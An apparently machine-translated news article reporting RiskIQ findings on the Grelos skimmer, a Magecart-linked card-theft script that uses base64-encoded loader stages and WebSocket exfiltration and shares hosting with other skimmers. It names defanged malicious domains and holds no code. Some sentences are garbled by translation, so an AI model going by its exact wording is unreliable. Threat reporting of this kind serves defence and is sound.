The discovery of a new variant of skimmer - the Grelos - reveals the difficulties associated with locating various Magecart campaigns.
On Wednesday, RiskIQ researchers described how a new Skimmer Grelos showed "increased overlap" in Magecart infrastructure and teams, with this malware - along with other forms of skimmer - now hosted on domain infrastructure used by many groups or affiliates through WHOIS subscriptions, well-known e-fishing campaigns (Phishing) and the development of other malicious programs, creating "associations" that may be difficult to separate.
Magecart is a term used to describe information theft and threat campaigns with agents specializing in the theft of payment card data from e-commerce sites.
Several years ago, well-known brands such as British Airways and Ticketmaster became the first major victims of this form of attack and since then, countless sites have fallen victim to the same technique.
The new version of Grelos skimmer, malware that has been around since at least 2015 and is associated with the Magecart 1 and 2 teams, looks like a separate strain described by researcher @AffableKraut in July. This variant is a WebSocket-based skimmer that uses base64 to hide them activities of.
"We believe that this skimmer is not directly related to the activity of Group 1-2 from 2015-16, but instead it is a repetition one of their code ", says RiskIQ. "This version of the skimmer has a 'loader stage' and a 'skimmer stage' - both of which have a fivefold base64 encoding."
The domains used in this cyber attack led the team to a cookie and related skimmer sites, including facebookapimanager [.] Com and googleapimanager [.] Com.
However, instead of finding the Skimmer Fullz House, researchers discovered a new skimmer variant, the Grelos. This strain has a similar loader stage with base64 encoding, but has only one coding level, duplicates script tags, spelling mistakes and includes a dictionary called "translate" which contains phrases used by fake forms payment created by malware. Web sockets are still used for data exfiltration.
RiskIQ has noticed several new skimmer variations associated with Magecart in recent years. The company says the Fullz House skimmer has been chosen by others hacking groups, even utilizing some of the same infrastructure - such as hosting providers - to host other skimmers, including Grelos, which also shares IPs with the Inter skimmer.
This, in turn, creates a "murkiness" in monitoring the activities of individual Magecart teams, many of which are actively launching new attacks against companies. e-commerce on a daily basis.